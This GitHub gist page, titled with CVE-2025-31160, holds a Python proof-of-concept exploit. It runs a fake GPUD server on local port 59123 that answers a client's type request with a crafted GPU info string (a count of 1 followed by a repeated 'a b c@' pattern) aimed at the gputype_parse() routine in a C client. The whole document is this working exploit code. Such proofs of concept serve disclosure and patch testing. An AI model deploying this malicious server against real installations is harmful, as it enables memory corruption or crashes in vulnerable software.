Skip to content

Instantly share code, notes, and snippets.

@kallsyms
Created March 29, 2025 23:16
Show Gist options
  • Save kallsyms/3acdf857ccc5c9fbaae7ed823be0365e to your computer and use it in GitHub Desktop.
Save kallsyms/3acdf857ccc5c9fbaae7ed823be0365e to your computer and use it in GitHub Desktop.
Bismuth CVE-2025-31160
import socket
import struct
import threading
import time
GPUDPORT = 59123
APIVERSION = 1
class GPUDServer:
def __init__(self, port=GPUDPORT):
self.port = port
self.server_socket = None
self.running = False
self.clients = []
def start(self):
"""Start the GPUD server"""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind(('127.0.0.1', self.port))
self.server_socket.listen(5)
self.running = True
print(f"GPUD Server started on port {self.port}")
# Start accepting client connections
accept_thread = threading.Thread(target=self.accept_connections)
accept_thread.daemon = True
accept_thread.start()
return accept_thread
def accept_connections(self):
"""Accept incoming client connections"""
while self.running:
try:
client_socket, address = self.server_socket.accept()
print(f"Client connected: {address}")
# Start a new thread to handle this client
client_thread = threading.Thread(
target=self.handle_client,
args=(client_socket, address)
)
client_thread.daemon = True
client_thread.start()
self.clients.append((client_socket, address, client_thread))
except:
break
def handle_client(self, client_socket, address):
"""Handle client connection and process requests"""
try:
# Receive the 'T' and APIVERSION from client
request = client_socket.recv(2)
print("REQ", request)
if len(request) == 2 and request[0] == ord('T') and request[1] == APIVERSION:
print(f"Received valid type request from {address}")
# Prepare GPU type information
gpu_info = self.get_gpu_type_info()
# Create prelude: version (1 byte) + length (3 bytes)
# Pack as big-endian (>) uint32 (I)
length = len(gpu_info)
prelude = struct.pack('>I', (APIVERSION << 24) | (length & 0xFFFFFF))
# Send prelude
client_socket.sendall(prelude)
# Send GPU information
client_socket.sendall(gpu_info.encode('utf-8'))
print(f"Sent response to {address}")
else:
print(f"Invalid request from {address}")
except Exception as e:
print(f"Error handling client {address}: {e}")
finally:
client_socket.close()
def get_gpu_type_info(self):
"""
Generate GPU type information to send to client.
Format should match what gputype_parse() in the C code expects.
"""
gpu_info = "1@" + ("a b c@" * 100)
return gpu_info
def stop(self):
"""Stop the server and close all connections"""
self.running = False
# Close all client connections
for client_socket, _, _ in self.clients:
try:
client_socket.close()
except:
pass
# Close server socket
if self.server_socket:
self.server_socket.close()
print("GPUD Server stopped")
def main():
server = GPUDServer()
accept_thread = server.start()
try:
# Keep the server running until Ctrl+C
while True:
time.sleep(1)
except KeyboardInterrupt:
print("Shutting down server...")
finally:
server.stop()
accept_thread.join(timeout=2)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment